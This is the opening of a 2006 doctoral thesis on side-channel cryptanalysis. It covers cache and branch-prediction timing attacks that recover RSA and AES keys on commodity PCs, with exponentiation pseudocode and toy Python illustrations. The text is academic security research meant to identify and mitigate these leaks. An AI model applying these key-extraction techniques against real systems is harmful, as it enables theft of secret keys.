AN ABSTRACT OF THE THESIS OF

Onur Acıiçmez for the degree of Doctor of Philosophy in Electrical and Computer Engineering presented on December 08, 2006.

Title: Advances in Side-Channel Cryptanalysis: MicroArchitectural Attacks

Abstract approved: Çetin Kaya Koç

Cryptographic devices leak easily measurable timing and power consumption information, radiation at various levels, and more. Such devices also have additional inputs other than plaintext and keys, such as voltage, which can be manipulated to force the device to produce faulty outputs that can be used to reveal the secret key. Side-channel cryptanalysis uses the information that leaks through one or more side channels of a cryptographic system to obtain secret information.

The initial focus of side-channel research was on smart card security. There are two main reasons why smart cards were the first type of device to be analyzed extensively from the side-channel point of view. First, smart cards store secret values inside the card and are specifically designed to protect and process these values. Therefore, there is a serious financial incentive in cracking smart cards, as well as in analyzing them and developing more secure smart card technologies. The recent promises from the Trusted Computing community include the secure storage of such secret values on PC platforms, c.f. [99]. These promises have made the side-channel analysis of PC platforms as desirable as that of smart cards. The second reason for the high attention to side-channel analysis of smart cards is the ease of applying such attacks to them. Side-channel measurements on smart cards are almost “noiseless”, which makes such attacks very practical. On the other hand, many factors affect such measurements on real commodity computer systems. These factors create noise, and therefore it is much more difficult to develop and perform successful attacks on the “real” computers of our daily life. Thus, until very recently, even systems running on servers were not “really” considered vulnerable to such side-channel attacks. This changed with the work of Brumley and Boneh, c.f. [21], who demonstrated a remote timing attack over a local network.

Because of the above reasons, we have seen an increased research effort on the security analysis of daily-life PC platforms from the side-channel point of view. In particular, it has been shown that the functionality of common components of processor architectures creates an indisputable security risk, c.f. [1, 2, 5, 14, 73, 80], which comes in different forms. In this thesis, we focus on side-channel cryptanalysis of cryptosystems on commodity computer platforms. Specifically, we analyze two main CPU components, the cache and the branch prediction unit, from the side-channel point of view. We show that the functionalities of these two components create very serious security risks in software systems, especially in software-based cryptosystems.
© Copyright by Onur Acıiçmez
December 08, 2006
All Rights Reserved

Advances in Side-Channel Cryptanalysis: MicroArchitectural Attacks

by
Onur Acıiçmez

A THESIS
submitted to
Oregon State University
in partial fulfillment of the requirements for the degree of
Doctor of Philosophy

Presented December 08, 2006
Commencement June 2007

Doctor of Philosophy thesis of Onur Acıiçmez presented on December 08, 2006

APPROVED:

Major Professor, representing Electrical and Computer Engineering

Director of the School of Electrical Engineering and Computer Science

Dean of the Graduate School

I understand that my thesis will become part of the permanent collection of Oregon State University libraries. My signature below authorizes release of my thesis to any reader upon request.

Onur Acıiçmez, Author

ACKNOWLEDGMENTS

I wish to express my most sincere gratitude to my major professor, Dr. Çetin Kaya Koç, who recognized my potential, sparked my interest in this particular topic, and guided me throughout the development of this work. I would like to give my special thanks to Dr. Werner Schindler and Dr. Jean-Pierre Seifert for introducing me to the challenging field of side-channel cryptanalysis, and especially for their guidance in conducting this research and producing the papers that formed the basis of this thesis. I also thank Dr. Bella Bose, Dr. Timothy Budd, Dr. Ben Lee, Dr. Lien Mei, and Dr. Oksana Ostroverkhova for dedicating their time to serve on my Ph.D. committee.

The most special thanks go to my parents for both their financial and emotional support throughout my entire education. I would also like to acknowledge so many dear friends, most of whom I have known for more than 20 years, for their encouragement to pursue my graduate education in the USA. I apologize for being unable to list each and every one of those precious individuals on this page. Thanks also to my colleagues in the Information Security Laboratory for their general support and for being such good friends.

Onur Acıiçmez
Hillsboro, Oregon, December 2006

TABLE OF CONTENTS

1 INTRODUCTION
  1.1 Overview of Side-Channel Analysis
  1.2 The Importance of Side-Channel Analysis on Computer Systems
  1.3 New Side-Channel Sources on Processors: MicroArchitectural Attacks
  1.4 Summary of Our Contributions to the Field
    1.4.1 Chapter 3: Remote Timing Attack on RSA
    1.4.2 Chapter 4: Survey on Cache Attacks
    1.4.3 Chapter 5: Cache Based Remote Timing Attack on the AES
    1.4.4 Chapter 6: Trace-Driven Cache Attacks on AES
    1.4.5 Chapter 7: Predicting Secret Keys via Branch Prediction
    1.4.6 Chapter 8: On the Power of Simple Branch Prediction Analysis

2 BACKGROUND
  2.1 Basics of RSA and Its Implementations
    2.1.1 Overview of RSA
    2.1.2 Exponentiation Algorithms
      2.1.2.1 Binary Square-and-Multiply Exponentiation Algorithm
      2.1.2.2 b-ary Square-and-Multiply Exponentiation Algorithm
      2.1.2.3 Sliding Window Exponentiation
      2.1.2.4 Balanced Montgomery Powering Ladder
    2.1.3 Montgomery Multiplication
    2.1.4 Chinese Remainder Theorem
  2.2 Basics of AES and Its Implementations
    2.2.1 Overview of AES
    2.2.2 AES Software Implementations
  2.3 Basics of Computer Microarchitecture: Cache and Branch Prediction
    2.3.1 Processor Cache
    2.3.2 Branch Prediction Units

3 REMOTE TIMING ATTACK ON RSA
  3.1 General Idea of a Timing Attack on RSA-CRT
  3.2 Overview of Brumley and Boneh Attack
  3.3 Details of Our Approach
  3.4 Implementation Details
  3.5 Experimental Results
    3.5.1 Comparison of our attack and BB-attack
    3.5.2 The details of our attack
      3.5.2.1 The distribution of time differences
      3.5.2.2 Error probabilities and the parameters
  3.6 Conclusion

4 SURVEY ON CACHE ATTACKS
  4.1 The Basics of a Cache Attack
    4.1.1 Basic Attack Models
      4.1.1.1 Model-1
      4.1.1.2 Model-2
  4.2 Cache Attacks in the Literature
    4.2.1 Theoretical Attack of D. Page
    4.2.2 First Practical Implementations
    4.2.3 Bernstein's Attack
    4.2.4 Percival's Hyper-Threading Attack on RSA
    4.2.5 Osvik-Shamir-Tromer (OST) Attacks
    4.2.6 Last Round Access-Driven Attack
    4.2.7 Cache-based Power Attack on AES from Bertoni et al.
    4.2.8 Lauradoux's Power Attack on AES
    4.2.9 Internal Cache Collision Attacks by Bonneau et al.
    4.2.10 Overview of Our Cache Attacks

5 CACHE BASED REMOTE TIMING ATTACK ON THE AES
  5.1 The Underlying Principle of Devising a Remote Cache Attack
  5.2 Details of Our Basic Attack
    5.2.1 First Round Attack
    5.2.2 Second Round Attack – Basic Variant
  5.3 A More Efficient, Universally Applicable Attack
    5.3.1 Comparison with the basic second round attack from Subsect. 5.2.2
  5.4 Experimental Details and Results
  5.5 Scaling the Sample Size N
  5.6 Conclusion

6 TRACE-DRIVEN CACHE ATTACKS ON AES
  6.1 Overview of Trace-Driven Cache Attacks
  6.2 Trace-Driven Cache Attacks on the AES
    6.2.1 Overview of an Ideal Two-Round Attack
    6.2.2 Overview of an Ideal Last Round Attack
    6.2.3 Complications in Reality and Actual Attack Scenarios
    6.2.4 Further Details of Our Attacks
  6.3 Analysis of the Attacks
    6.3.1 Our Model
    6.3.2 Trade-off Between Online and Offline Cost
  6.4 Experimental Details
  6.5 Conclusion

7 PREDICTING SECRET KEYS VIA BRANCH PREDICTION
  7.1 Outlines of Various Attack Principles
    7.1.1 Attack 1 — Exploiting the Predictor Directly (Direct Timing Attack)
      7.1.1.1 Examples of vulnerable systems
    7.1.2 Attack 2 — Forcing the BPU to the Same Prediction (Asynchronous Attack)
      7.1.2.1 Examples of vulnerable systems
    7.1.3 Attack 3 — Forcing the BPU to the Same Prediction (Synchronous Attack)
      7.1.3.1 Examples of vulnerable systems
    7.1.4 Attack 4 — Trace-driven Attack against the BTB (Asynchronous Attack)
      7.1.4.1 Examples of vulnerable systems
  7.2 Practical Results
    7.2.1 Results for Attack 2 = Forcing the BPU to the Same Prediction (Asynchronous Attack)
    7.2.2 Results for Attack 4 = Trace-driven Attack against the BTB (Asynchronous Attack)
  7.3 Conclusions and recommendations for further research

8 ON THE POWER OF SIMPLE BRANCH PREDICTION ANALYSIS
  8.1 Multi-Threading, spy and crypto processes
  8.2 Improving Trace-driven Attacks against the BTB
  8.3 Practical Results
  8.4 Conclusions

9 CONCLUSION

BIBLIOGRAPHY

LIST OF FIGURES

2.1 Binary version of Square-and-Multiply Exponentiation Algorithm
2.2 b-ary version of Square-and-Multiply Exponentiation Algorithm
2.3 Sliding Window Exponentiation Algorithm
2.4 Balanced Montgomery Powering Ladder
2.5 Montgomery Multiplication Algorithm
2.6 RSA with CRT
2.7 Round operations in AES
2.8 Branch Prediction Unit Architecture
3.1 Modular Exponentiation with Montgomery's Algorithm
3.2 The distribution of ∆_j in terms of clock cycles for 0 ≤ j ≤ 5000, sorted in descending order, for the sample bit q_61. The graph on the left shows this distribution when q_61 = 1. The distribution on the right is observed when q_61 = 0.
4.1 Cache Attack Model-1
4.2 Cache states
4.3 Two different accesses to the same table
4.4 DES S-Box lookup
6.1 Figure 2
6.2 Figure 3
6.3 Figure 4
7.1 Practical results when using the total eviction method in attack principle 2
7.2 Practical results when using the single eviction method in attack principle 2
7.3 Increasing gap between multiplication and squaring steps due to missing BTB entries
7.4 Connecting the spy-induced BTB misses and the square/multiply cycle gap
8.1 Front-End Instruction Pipeline Stages feeding the µop Queue
8.2 Results of SBPA with an improved resolution
8.3 Enhancing a bad resolution via independent repetition
8.4 Best result of our SBPA against OpenSSL RSA, yielding 508 out of 512 secret key bits

LIST OF TABLES

3.1 The configuration used in the experiments
3.2 Average ∆ and ∆_BB values and 0-1 gaps. The values are given in terms of clock cycles.
3.3 The percentage of the majority of time differences that are either positive or negative (empirical values)
3.4 Columns 2 and 3 show the parameters that can be used to yield the intended accuracy. The last columns give the expected number of steps for N_max = ∞, calculated using Formula (3.11), to reach the target difference D.
7.1 The configuration used in the experiments

Advances in Side-Channel Cryptanalysis: MicroArchitectural Attacks

1. INTRODUCTION

Information security has always been a concern of the human race. Even ancient civilizations developed methods that are the first examples of encryption algorithms. Advances in the security fields, including cryptography, have affected almost every aspect of human life and science. For example, the first programmable Turing machine, which can be considered the first computer ever built, even before ENIAC, was engineered to break cryptosystems like Enigma [104, 45].

The increasing importance of information technologies such as electronic devices, personal computers, and of course the Internet in daily life has broadened both the range and the need of information security. As an eventual result, security-related applications have gained even more popularity and become a fundamental and indispensable part of information systems. These reasons triggered the transition of the responsibility for handling security-critical applications from mainframe computers and custom-built devices to widely used and high-volume manufactured commodity electronics, including personal computers, servers, handheld devices, and smart cards. This transition also mandates a revision of how we design and analyze security systems by identifying, developing, and adapting new security requirements and threat models.

The sole purpose of this thesis is to contribute to this revision process. We identify some components of commodity computers as novel and unforeseen security risks. Our findings have significant value for processor vendors, software developers, system designers, security architects, cryptographers, and especially for ongoing secure platform development efforts (c.f. [99]) in the sense that they bring new security requirements and threat models that must be considered during secure microprocessor design, system and software development, and cryptosystem design.
The identification of requirements for secure execution environments has been a challenging task since the invention of high-complexity computing devices. The security requirements of early computer systems were defined with monolithic mainframe computers in mind (c.f. [106, 13, 32] and also [46] for a nice collection of early computer security efforts). Today, the domination of multiuser PC and server platforms and of multitasking operating systems mandates a serious revision of these early requirements.

Recently, we have seen an increased effort on the security analysis of daily-life computer platforms. The advances in the field, more specifically the desire to develop secure execution technologies such as Intel's Virtualization Technology (VT) and Trusted Execution Technology (TXT) (codenamed LaGrande Technology, or LT for short), play an important role in increasing the attention on the analysis of computer platform security, c.f. [99]. Here, it has been especially shown that microarchitectural properties of modern CPUs create a significant security risk (c.f. [5, 1, 2, 14, 72, 73, 80]). In this thesis, we analyze two main CPU components, the cache and the branch prediction unit, from the side-channel point of view. We show that the functionalities of these two components create very serious security risks in software systems, especially in software-based cryptosystems.

Cryptosystems have traditionally been analyzed as perfect mathematical objects. In those analyses, the cipher under examination is considered a black box that realizes a mapping from the input values (plaintext and secret key) to an output (ciphertext). The security of a cipher is determined by analyzing its mathematical description via formal and statistical methods. Therefore, conventional cryptography only deals with the mathematical model of cryptosystems. However, any practical implementation of a cryptosystem leaks sensitive information due to the compulsory characteristics of the physical devices, which are ignored in the security models of conventional cryptography. Side-channel analysis, which is a relatively new area of applied cryptography, tries to fill this gap between the theory of conventional cryptography and the actual physical situation in the real world.

Cryptographic devices leak easily measurable timing and power consumption information, radiation at various levels, and more. Such devices also have additional inputs, other than plaintext and keys, like voltage, which can be modified to force the device to produce certain faulty outputs that can be used to reveal the secret key. Side-channel cryptanalysis uses the information that leaks through one or more side channels of a cryptographic system to obtain secret information. It would be unrealistic to explain all aspects of side-channel cryptanalysis in this document, hence we give only a brief overview in Section 1.1.

1.1. Overview of Side-Channel Analysis

Side channels of a cryptosystem include, but are not restricted to, power consumption, execution time, and electromagnetic emanation. In other words, the secret key of a carelessly designed cryptographic device can be obtained by tracing the power consumption, electromagnetic emanation, and/or the execution time of the device. An attacker can learn about the processes that occur inside a cryptosystem and gain invaluable information about the secret key by analyzing the power consumption of the system during encryption/decryption.
Integrated circuits are built out of individual transistors acting as voltage-controlled switches. The motion of electrical charge through these transistors consumes power and produces electromagnetic radiation, both of which are externally detectable.

Side-channel attacks, including power analysis attacks, have two typical phases: data collection and data analysis. Data collection involves sampling a device's side-channel information, i.e., the power consumption or electromagnetic emanation as a function of time. In this phase, a sample of cryptographic operations, which are executed under the same key, is inspected. The next phase involves analyzing the collected data and extracting information about the key.

There are mainly two types of power analysis known in the literature: Simple Power Analysis (SPA) and Differential Power Analysis (DPA). SPA attacks involve direct interpretation of power consumption measurements collected during cryptographic computations. The sequence of performed operations determines the amount of power consumed by an electronic device. SPA attacks rely on observing the power consumption traces of an active device, and these observations can reveal the sequence of operations executed in that device during a cryptographic computation. The operation sequences of some cipher implementations can be directly translated into the value of the secret key. DPA attacks are more powerful than SPA attacks, and they are harder to prevent. While SPA attacks use visual inspection to identify power fluctuations, DPA attacks use sophisticated statistical analysis and error-correction techniques to extract information about the secret key.

The principles of Simple Power Analysis (SPA) and Differential Power Analysis (DPA) rely on the power consumption variations that are generated as a consequence of the varying sequences of operations executed depending on the values of the plaintext inputs and the secret key. Similarly, Simple Electromagnetic Analysis (SEMA) and Differential Electromagnetic Analysis (DEMA) allow retrieving the key using the same concept, except that they use electromagnetic radiation measurements instead of power consumption.

In this thesis, we mainly focus on a specific type of side-channel attack, called timing attacks, which uses the execution time of cryptographic devices to reveal the secret data. In a timing attack, the adversary observes the running time of a cryptosystem for different inputs and compromises the secret key using this time behavior. Timing attacks are based on the fact that certain cryptosystems take different amounts of time to process different inputs.

So far, the typical targets of side-channel attacks have been smart cards. The side-channel analysis of computer systems attracted much less attention compared to smart cards. The main reasons for this trend are explained in Section 1.2. However, due to the recent advances in the security area, side-channel analysis of computer systems has recently gained significant importance. Moreover, it has been realized that some of the components of modern computer microarchitectures leak certain side-channel information and thus create unforeseen security risks, c.f. [5, 1, 2, 73, 14, 80]. In this thesis, we tackle this particular problem and contribute to the field via identification, analysis, and mitigation of microarchitectural side-channel vulnerabilities.
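To make the timing-attack principle described in this overview concrete, the following toy Python sketch (purely illustrative and not part of the thesis; the cost and noise parameters are invented for the example) models an operation whose running "time" depends on a secret bit and shows how averaging many noisy measurements lets an observer recover that bit.

    import random

    SECRET_BIT = 1  # unknown to the attacker in a real setting

    def measure_once():
        """Return a simulated execution time: a secret-dependent cost plus noise."""
        base = 100                       # cost of the always-executed work
        extra = 20 if SECRET_BIT else 0  # extra work performed only when the bit is 1
        noise = random.gauss(0, 15)      # measurement noise (e.g., OS and network jitter)
        return base + extra + noise

    def guess_bit(samples=2000, threshold=110):
        """Average many measurements and compare against a calibrated threshold."""
        avg = sum(measure_once() for _ in range(samples)) / samples
        return 1 if avg > threshold else 0

    print("recovered bit:", guess_bit())

The same averaging idea, applied bit by bit and with far more careful statistics, underlies the timing attacks discussed in the following chapters.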
1.2. The Importance of Side-Channel Analysis on Computer Systems

Side-channel cryptanalysis has attracted very significant attention since Kocher's discoveries of timing and power analysis attacks [59, 60]. He showed that cryptographic implementations leak sensitive information because of the physical properties and requirements of the devices the systems are implemented on. Classical cryptography, which analyzes cryptosystems as perfect mathematical objects and ignores the physical analysis of the implementations, fails to identify such side-channel leakages. Therefore it is necessary to utilize both classical cryptography and side-channel cryptanalysis in order to develop and implement secure systems.

The initial focus of side-channel research was on smart card security. A smart card is a standard credit card-sized plastic token with an embedded microchip that makes it "smart". Smart cards are used for identification or financial transactions and therefore need built-in security features. In today's smart cards, the clock signal and the electrical power are among the inputs supplied from the outside. Hence, the power consumption and the execution time of a smart card are very easy to measure with almost no noise. This property of smart cards makes them more vulnerable to side-channel attacks than computer systems. The security community has a more or less clear picture of what the side-channel vulnerabilities of smart cards are, what the threat models are, and how to mitigate side-channel attacks on smart cards.

There are two main reasons why smart cards were the first type of device to be analyzed extensively from the side-channel point of view. First, smart cards store secret values inside the card and are especially designed to protect and process these secret values. Therefore, there is a serious financial incentive in cracking smart cards, as well as in analyzing them and developing more secure smart card technologies. The recent promises from the Trusted Computing community include the secure storage of such secret values on PC platforms, c.f. [99]. These promises have made the side-channel analysis of PC platforms as desirable as that of smart cards. The second reason for the high attention to side-channel analysis of smart cards is the ease of applying such attacks to them. Side-channel measurements on smart cards are almost "noiseless", which makes such attacks very practical. On the other hand, many factors affect such measurements on real commodity computer systems. These factors create noise, and therefore it is much more difficult to develop and perform successful attacks on the "real" computers of our daily life. Thus, until very recently, even systems running on servers were not "really" considered to be at risk from such side-channel attacks. This changed with the work of Brumley and Boneh, c.f. [21], who demonstrated a remote timing attack over a local network. They simply adapted the attack principle introduced in [85] to show that side-channel attacks are a real danger not only to smart cards but also to widely used computer systems.

1.3. New Side-Channel Sources on Processors: MicroArchitectural Attacks

Because of the above reasons, we have seen an increased research effort on the security analysis of daily-life PC platforms from the side-channel point of view.
Here, it has been especially shown that the functionality of the common components of processor architectures creates an indisputable security risk, c.f. [1, 2, 5, 14, 73, 80], which comes in different forms. Although the cache itself has been known for a long time to be a crucial security risk of modern CPUs, c.f. [95, 48], the works [5, 14, 73, 80] were the first to demonstrate such vulnerabilities practically and raised broad public interest in them. These advances initiated a new research vector to identify, analyze, and mitigate the security vulnerabilities that are created by the design and implementation of processor components.

Especially in the light of ongoing Trusted Computing efforts, cf. [99], which promise to turn the commodity PC platform into a trustworthy platform, c.f. also [25, 35, 42, 79, 99, 103], the formerly described side-channel attacks against PC platforms are of particular interest. This is due to the fact that side-channel attacks have been completely ignored by the Trusted Computing community so far. Even more interesting is the fact that all of the above pure software side-channel attacks also allow a totally unprivileged process to attack other processes running in parallel on the same processor (or even remotely), despite sophisticated partitioning methods such as memory protection, sandboxing or even virtualization. This particularly means that side-channel attacks render all of the sophisticated protection mechanisms, such as those described in [42, 103], useless. The simple reason for the failure of these trust mechanisms is that the new side-channel attacks simply exploit deeper processor ingredients — i.e., below the trust architecture boundary, c.f. [81, 42].

We define MicroArchitectural Side-Channel Attacks as the attacks that exploit the side-channel leakage due to the microarchitectural properties of microprocessors. So far, we have seen two types of microarchitectural attacks, cache and branch prediction analysis, which are discussed in detail in this thesis.

1.4. Summary of Our Contributions to the Field

In this document, we present the details of our work in the area of MicroArchitectural Side-Channel Analysis. We also give an overview of the first remote timing attack on computers, i.e., the Brumley and Boneh attack [21], and propose certain improvements over this original attack. The following subsections summarize our contributions and also the content of this thesis.

1.4.1. Chapter 3: Remote Timing Attack on RSA

Since the remarkable work of Kocher [59], several papers considering different types of timing attacks have been published. In 2003, Brumley and Boneh presented a timing attack on unprotected OpenSSL implementations [21]. In this chapter, we discuss how to improve the efficiency of their attack by a factor of more than 10. We exploit the timing behavior of Montgomery multiplications in the table initialization phase, which allows us to increase the number of multiplications that provide useful information to reveal one of the prime factors of RSA moduli. We also present other improvements, which can be applied to the attack in [21].

1.4.2. Chapter 4: Survey on Cache Attacks

This chapter gives an overview of the current cache-based side-channel attacks in the literature. We first describe two different attack models that constitute the basis of various cache-based attacks. Then we discuss the details of each cache attack separately.
We omit the details of our own attacks in this chapter, since they are discussed in depth in the following chapters.

1.4.3. Chapter 5: Cache Based Remote Timing Attack on the AES

We introduce a new robust cache-based timing attack on AES. We present experiments and concrete evidence that our attack can be used to obtain secret keys of remote cryptosystems if the server under attack runs on a multitasking or simultaneous multithreading system with a large enough workload. This is an important difference from recent cache-based timing attacks, as those attacks either did not provide any supporting experimental results indicating whether they can be applied remotely, or they are not realistically remote attacks.

1.4.4. Chapter 6: Trace-Driven Cache Attacks on AES

In this chapter, we present efficient trace-driven cache attacks on a widely used implementation of the AES cryptosystem. We also evaluate the cost of the proposed attacks in detail under the assumption of a noiseless environment. We develop an accurate mathematical model that we use in the cost analysis of our attacks. We use two different metrics, specifically the expected number of necessary traces and the cost of the analysis phase, for the cost evaluation. Each of these metrics represents the cost of a different phase of the attack.

1.4.5. Chapter 7: Predicting Secret Keys via Branch Prediction

This chapter announces a new software side-channel attack — enabled by the branch prediction capability common to all modern high-performance CPUs. The penalty paid (extra clock cycles) for a mispredicted branch can be used for cryptanalysis of cryptographic primitives that employ a data-dependent program flow. Analogous to the recently described cache-based side-channel attacks, our attacks also allow an unprivileged process to attack other processes running in parallel on the same processor, despite sophisticated partitioning methods such as memory protection, sandboxing or even virtualization. In this chapter, we discuss several such attacks for the example of RSA, and experimentally show their applicability to real systems, such as OpenSSL and Linux. Moreover, we also demonstrate the strength of the branch prediction side-channel attack by rendering the obvious countermeasure in this context (Montgomery Multiplication with dummy reduction) useless. Although the deeper consequences of the latter result make writing an efficient and secure modular exponentiation (or scalar multiplication on an elliptic curve) a challenging task, we eventually suggest some countermeasures to mitigate branch prediction side-channel attacks.

1.4.6. Chapter 8: On the Power of Simple Branch Prediction Analysis

Very recently, we have discovered a new software side-channel attack, called the Branch Prediction Analysis (BPA) attack, and also demonstrated its practicality on popular commodity PC platforms. While that recent attack still had the flavor of a classical timing attack against RSA, where one uses many execution-time measurements under the same key in order to statistically amplify some small but key-dependent timing differences, we dramatically improve upon the former result. We prove that a carefully written spy process running simultaneously with an RSA process is able to collect almost all of the secret key bits during one single RSA signing execution.
We call such an attack, analyzing the CPU's Branch Predictor states through spying on a single quasi-parallel computation process, a Simple Branch Prediction Analysis (SBPA) attack — sharply differentiating it from those relying on statistical methods and requiring many computation measurements under the same key. The successful extraction of almost all secret key bits by our SBPA attack against an OpenSSL RSA implementation proves that the often recommended blinding or so-called randomization techniques to protect RSA against side-channel attacks are, in the context of SBPA attacks, totally useless. In addition to that very crucial security implication, targeted at such implementations which are assumed to be at least statistically secure, our successful SBPA attack also bears another equally critical security implication. Namely, in the context of simple side-channel attacks, it is widely believed that equally balancing the operations after branches is a secure countermeasure against such simple attacks. Unfortunately, this is not true, as even such "balanced branch" implementations can be completely broken by our SBPA attacks. Moreover, despite sophisticated hardware-assisted partitioning methods such as memory protection, sandboxing or even virtualization, SBPA attacks empower an unprivileged process to successfully attack other processes running in parallel on the same processor. Thus, we conclude that SBPA attacks are much more dangerous than previously anticipated, as they obviously do not belong to the same category as pure timing attacks.

2. BACKGROUND

In this section, we give the necessary background information to understand the rest of this document. This section focuses on two encryption algorithms: RSA, which is the most widely used public-key cryptosystem, and AES, which is the new American standard for secret-key encryption. We also give basic information on some of the processor components, more specifically on the cache and the branch prediction unit, which are analyzed from a side-channel point of view in this document. In order to keep this document at a reasonable size, we omit many details on the aforementioned subjects. We simply refer the reader to the following references for further details:

• Cryptography: [64, 90, 97, 56, 96, 104, 98]
• RSA: [82, 17, 12, 49, 50, 84, 29, 57, 58]
• AES: [31, 8, 9]
• Computer Architecture: [41, 78, 33, 91, 92]

2.1. Basics of RSA and Its Implementations

In this section we give the necessary information about RSA and specific implementation techniques in order to make the reader understand the attacks we explain in the next sections. We start with an overview of the RSA cryptosystem. Then we cover some of the exponentiation techniques and efficient modular multiplication algorithms. All of these algorithms are currently being used in various implementations of RSA. The reader should note that this section is not comprehensive in terms of the algorithms used in RSA implementations. However, we cover everything necessary to grasp the basic ideas presented in this document.

2.1.1. Overview of RSA

RSA is a public key cryptosystem which was developed by Rivest, Shamir and Adleman [82]. The main computation in RSA decryption is the modular exponentiation P = M^d (mod N), where M is the message or the ciphertext, d is the private key that is kept secret, and N is the public modulus which is known to anyone. Indeed, N is a product of two large primes p and q. The strength of RSA comes from the hardness of the factoring problem. It is assumed that even though N is a publicly known number, the factors of N cannot be calculated. If an adversary obtains the secret value d, he can read all of the encrypted messages and impersonate the owner of the key. Therefore, the main purpose of using side-channel attacks on RSA is to reveal this secret value. If the adversary can factorize N, i.e., he can obtain either p or q, the value of d can easily be calculated. Hence, the attacker tries to find either p, q, or d.

Since the size of the key, i.e., the size of d, in RSA is very large, e.g., around 1024 or 2048 bits, the exponentiation is very expensive in terms of execution time. Therefore the actual implementations of RSA need to employ efficient algorithms to calculate the result of this operation. In the next subsections, we explain the most widely used algorithms, which can also be exploited in side-channel attacks.
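The following minimal Python sketch (illustrative only, with toy parameters far too small to be secure) makes the last point concrete: once the factors p and q are known, the private exponent d follows from the public exponent e by a modular inverse, and decryption is the single modular exponentiation P = M^d mod N.

    # Toy RSA parameters -- chosen only for illustration.
    p, q = 61, 53
    N = p * q                      # public modulus
    e = 17                         # public exponent
    phi = (p - 1) * (q - 1)        # Euler's totient of N
    d = pow(e, -1, phi)            # private exponent: d = e^{-1} mod phi(N)

    M = 42                         # "message"
    C = pow(M, e, N)               # encryption: C = M^e mod N
    P = pow(C, d, N)               # decryption: P = C^d mod N
    assert P == M                  # knowing the factors of N was enough to recover d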
2.1.2. Exponentiation Algorithms

In this subsection, four different methods to compute an exponentiation are presented. For a more comprehensive treatment of exponentiation techniques, we refer the reader to [57, 64]. Let us say we want to compute M^d (mod N), where d is an n-bit number, i.e., d = (d_0, d_1, ..., d_{n-1})_2.

2.1.2.1. Binary Square-and-Multiply Exponentiation Algorithm

The binary version of the Square-and-Multiply Algorithm (SM) is the simplest way to perform an exponentiation. Figure 2.1 shows the steps of SM, which processes the bits of d from left to right. There are also versions of the SM algorithm that process d in reverse order. The reader should note that all of the multiplications and squarings are shown as modular operations, although the basic SM algorithm computes regular exponentiations. This is because RSA performs modular exponentiation, and our focus is on this cryptosystem. In an efficient RSA implementation, all of the multiplications and squarings are performed by using a special modular multiplication algorithm called Montgomery Multiplication (c.f. Section 2.1.3).

    S = M
    for i from 1 to n - 1 do
        S = S * S (mod N)
        if d_i = 1 then S = S * M (mod N)
    return S

FIGURE 2.1. Binary version of Square-and-Multiply Exponentiation Algorithm

2.1.2.2. b-ary Square-and-Multiply Exponentiation Algorithm

A more advanced version of SM, called the b-ary method, decreases the total number of multiplications during the exponentiation. In this method, the n-bit exponent d is considered to be in radix-2^b form, i.e., d = (d_0, d_1, ..., d_{k-1})_{2^b}, where n = k * b. It requires a preprocessing phase to compute multiples of M so that many multiplications can be combined during the exponentiation phase. The steps of this algorithm are shown in Figure 2.2.

    e_1 = M
    for i from 2 to 2^b - 1 do
        e_i = e_{i-1} * M (mod N)
    S = e_{d_0}
    for i from 1 to k - 1 do
        S = S^(2^b) (mod N)
        if d_i != 0 then S = S * e_{d_i} (mod N)
    return S

FIGURE 2.2. b-ary version of Square-and-Multiply Exponentiation Algorithm
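As a concrete reference, here is a small Python rendering of the left-to-right binary square-and-multiply algorithm of Figure 2.1 (an illustrative sketch, not the OpenSSL code analyzed later). The key-dependent "if" executed for each exponent bit is exactly the kind of branch that the cache and branch prediction attacks in this thesis exploit.

    def square_and_multiply(M, d_bits, N):
        """Left-to-right binary exponentiation: computes M^d mod N.
        d_bits is the exponent as a list of bits, most significant bit first."""
        assert d_bits[0] == 1
        S = M % N
        for bit in d_bits[1:]:
            S = (S * S) % N          # a squaring is performed for every bit
            if bit == 1:             # key-dependent branch: extra multiplication
                S = (S * M) % N
        return S

    # Quick check against Python's built-in modular exponentiation.
    d = 0b101101
    bits = [int(b) for b in bin(d)[2:]]
    assert square_and_multiply(7, bits, 1009) == pow(7, d, 1009)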
2.1.2.3. Sliding Window Exponentiation

This algorithm is very similar to the b-ary method, except for a slight modification. In the b-ary method the exponent d is split into consecutive 'windows' of b bits each. The number of multiplications can be further decreased by splitting d into odd windows of at most b consecutive bits, where the windows are not necessarily adjacent and may be separated by zero bits (c.f. Figure 2.3).

    e_1 = M, e_2 = M^2 (mod N)
    for i from 1 to 2^(b-1) - 1 do
        e_{2i+1} = e_{2i-1} * e_2 (mod N)
    S = 1, i = 0
    while i < k do
        if d_i = 0 then
            S = S * S (mod N)
            i = i + 1
        else
            find the maximum t such that t - i + 1 <= b, t < k, and d_t = 1
            l = (d_i, ..., d_t)_2
            S = S^(2^(t-i+1)) * e_l (mod N)
            i = t + 1
    return S

FIGURE 2.3. Sliding Window Exponentiation Algorithm

2.1.2.4. Balanced Montgomery Powering Ladder

In the context of side-channel attacks, c.f. [28, 59, 52], it was quickly "agreed" that simple side-channel attacks could be (simply) mitigated by avoiding the unbalanced and key-dependent conditional branch in the above Figures 2.1 and 2.3, and by inserting dummy operations into the flow in order to make the operations after the conditional branch more balanced, c.f. [52]. As this "dummy equipped" binary SM algorithm still had some negative side effects, a very active research area arose around the so-called Balanced Montgomery Powering Ladder, shown in Figure 2.4. This exponentiation is assumed to be "intrinsically secure" against simple side-channel attacks, c.f. [52], and also has many computational advantages over the basic SM algorithm above. Unfortunately, as we explain later in Chapter 7, all those "balanced branch" exponentiation algorithms are "intrinsically insecure" in the presence of Branch Prediction attacks.

    R_0 = 1; R_1 = M
    for i from 0 to n - 1 do
        if d_i = 0 then
            R_1 = R_0 * R_1 (mod N)
            R_0 = R_0 * R_0 (mod N)
        else [if d_i = 1]
            R_0 = R_0 * R_1 (mod N)
            R_1 = R_1 * R_1 (mod N)
    return R_0

FIGURE 2.4. Balanced Montgomery Powering Ladder

2.1.3. Montgomery Multiplication

Montgomery Multiplication (MM) is the most efficient algorithm to compute a modular multiplication. It uses additions and divisions by powers of 2, which can be accomplished by shifting the operand to the right, to calculate the result; therefore it is very suitable for hardware architectures. Since it eliminates time-consuming integer division operations, the efficiency of the algorithm is very high.

